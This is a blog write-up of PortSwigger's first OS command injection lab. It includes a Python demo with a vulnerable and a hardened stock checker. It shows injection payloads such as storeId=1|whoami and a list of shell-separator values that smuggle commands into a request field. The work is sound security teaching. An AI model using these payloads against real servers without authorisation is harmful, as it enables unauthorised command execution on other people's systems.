OS Command Injection (PortSwigger): Lab 1: OS command injection, simple case

Jay Pomal
Feb 28, 2021 (4 min read)


Hey folks, how's it going? I hope everybody is okay and doing well. Today we are going to work through some of the OS command injection labs from PortSwigger. If you don't know about PortSwigger's Web Security Academy, I would recommend visiting it if you are a beginner in pen-testing: https://portswigger.net/

We will be discussing all of the OS command injection labs in these write-ups, so sit tight and enjoy.

First of all, what is OS command injection?

The better question is: what is injection in general? An injection vulnerability exists when an application passes attacker-controlled input to an interpreter without proper validation or escaping, so that part of the data is treated as code. The interpreter decides the flavour of the attack: SQL injection targets the database, cross-site scripting targets the browser's JavaScript engine, server-side template injection targets a template engine. OS command injection (also called shell injection) is the case where the interpreter is the operating system's command shell. The application builds a shell command string out of user input, and by adding shell metacharacters the attacker gets to run arbitrary OS commands on the server where the application is deployed, with the privileges of the application process.

Okay, so let's get started.

LAB 1: OS command injection, simple case

This lab contains an OS command injection vulnerability in the product stock checker. The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response. To solve the lab, execute the whoami command to determine the name of the current user.

In the lab we are presented with a web application that lists a lot of products, as we can see in the picture below.

Upon viewing the details of a product we get detailed information about it, and we can see that visiting a specific product sets a parameter named productId. This is where we can try to perform command injection, and I did, but with no luck, because the details are fetched through an API that rejects special characters. But there is another function that lets us check the availability of stock, as we can see in the picture below.

When we use the stock-check function we get a result, but nothing changes in the URL parameters. Maybe something is going on in the request that we cannot see from the browser. This is where the tool Burp Suite comes into the picture. Burp Suite is an intercepting web proxy for analysing requests, modifying them and much more.

As we can see in the picture above, when we intercept the stock-checker request we find a hidden parameter called storeId (it never appears in the URL) that is sent along with productId to fetch the information. Having already tested productId for OS command injection and found it not to be vulnerable, it is now time to test the storeId parameter.

With the request captured in Burp Suite, it is time to test the hidden storeId parameter for OS command injection. A shell metacharacter lets us chain a second command onto the one the application runs. As the picture above shows, we use the pipe character (|) to run our own command on the back-end server, for example storeId=1|whoami: the shell feeds the output of the application's command into ours, and ours runs regardless of what the first one did. There are other separators that work too, such as ; and & (sequential and background execution), && and || (conditional on the first command succeeding or failing), a newline (%0a when URL-encoded), and command substitution with backticks or $( ). You can test these yourself. When we forward the edited request we see the result in the picture below.
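To make concrete what the stock checker is doing behind the scenes, here is an added example (not the lab's own code; the page does not show the real server-side command) that stands in for the back end described in the lab text: a function that builds the command by string concatenation and runs it through /bin/sh, a hardened version that allowlists the IDs and executes the program without a shell, and a probe that tries each of the separators listed above through the vulnerable version. The echo command, the units-in-stock output format, the function names and the ID pattern are all assumptions made for the example; the marker payload echo INJECTED stands in for whoami so the result is easy to recognise.

```python
import re
import subprocess

# Assumed stand-in for the lab's back-end command (the real one is not shown):
# the two IDs are concatenated into one command line and handed to /bin/sh.
# `echo` plays the role of the real stock-report program.
def vulnerable_stock_check(product_id: str, store_id: str) -> str:
    """Vulnerable: shell=True passes the whole string to /bin/sh, so any shell
    metacharacter inside product_id or store_id is parsed as shell syntax."""
    cmd = f"echo units-in-stock productId={product_id} storeId={store_id}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


ID_PATTERN = re.compile(r"[0-9]{1,9}")  # allowlist: an ID is a short decimal integer


def hardened_stock_check(product_id: str, store_id: str) -> str:
    """Hardened: allowlist-validate both IDs, then exec the program directly
    with an argv list. No shell is involved, so separators mean nothing."""
    for name, value in (("productId", product_id), ("storeId", store_id)):
        if not ID_PATTERN.fullmatch(value):
            raise ValueError(f"{name} must be a decimal integer, got {value!r}")
    argv = ["echo", "units-in-stock", f"productId={product_id}", f"storeId={store_id}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def hardened_rejects(product_id: str, store_id: str) -> bool:
    """True if the hardened checker refuses the input (helper for the checks)."""
    try:
        hardened_stock_check(product_id, store_id)
    except ValueError:
        return True
    return False


def argv_without_validation(product_id: str, store_id: str) -> str:
    """The argv form alone, validation skipped: shows that even then a payload
    reaches the program as one literal argument instead of being executed."""
    argv = ["echo", "units-in-stock", f"productId={product_id}", f"storeId={store_id}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


# Separators to try in storeId. Each carries the harmless marker command
# `echo INJECTED` in place of whoami so the outcome is recognisable.
SEPARATOR_PAYLOADS = {
    "pipe": "1|echo INJECTED",          # our command consumes the first one's output
    "semicolon": "1;echo INJECTED",     # sequential, unconditional
    "background": "1&echo INJECTED",    # first command backgrounded, ours runs at once
    "and-and": "1&&echo INJECTED",      # ours runs only if the first command succeeded
    "or-or": "1||echo INJECTED",        # ours runs only if the first command FAILED
    "backtick": "1`echo INJECTED`",     # command substitution inside the argument
    "subshell": "1$(echo INJECTED)",    # same thing, POSIX $( ) form
    "newline": "1\necho INJECTED",      # %0a in a URL-encoded request body
}


def probe_separators() -> dict:
    """Run each payload through the vulnerable checker; True means the marker
    command executed, i.e. its output appears in the response."""
    return {name: "INJECTED" in vulnerable_stock_check("1", payload)
            for name, payload in SEPARATOR_PAYLOADS.items()}


if __name__ == "__main__":
    print(vulnerable_stock_check("1", "1|whoami"), end="")   # the lab's payload
    for name, hit in probe_separators().items():
        print(f"{name:10s} {'injected' if hit else 'no effect'}")
    print(argv_without_validation("1", "1|whoami"), end="")  # printed back literally
    print("hardened rejects 1|whoami:", hardened_rejects("1", "1|whoami"))
```

Running the script shows why the pipe is the reliable first choice: with | the response consists of nothing but the injected command's output, which is exactly what the lab asks for. The || separator is the one that does not fire here, because the first echo succeeds; in a real target it only helps when the application's command fails (for example because the mangled ID makes it error out). The hardened version demonstrates the two controls that matter: an allowlist on what an ID may look like, and never building a shell string in the first place.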

As we can see in the picture above, our command ran successfully and the response contains the output of whoami, which means the application is vulnerable to OS command injection. We can also test other commands such as pwd, uname -a or netstat; you can try these yourself, but I tested one more command, pwd, as we can see in the picture below.

When we forward this request the command runs and gives us the present working directory of the target system, as we can see in the picture below.

And that was it for this lab.

Thank you everyone for taking the time to read this. I hope you gained some useful knowledge from it. If you have anything to say or any doubts, you can post them in the comment section.

Keep enumerating. Enumeration is the key.

Happy hacking.


Written by Jay Pomal

Ethical Hacker and Security Researcher
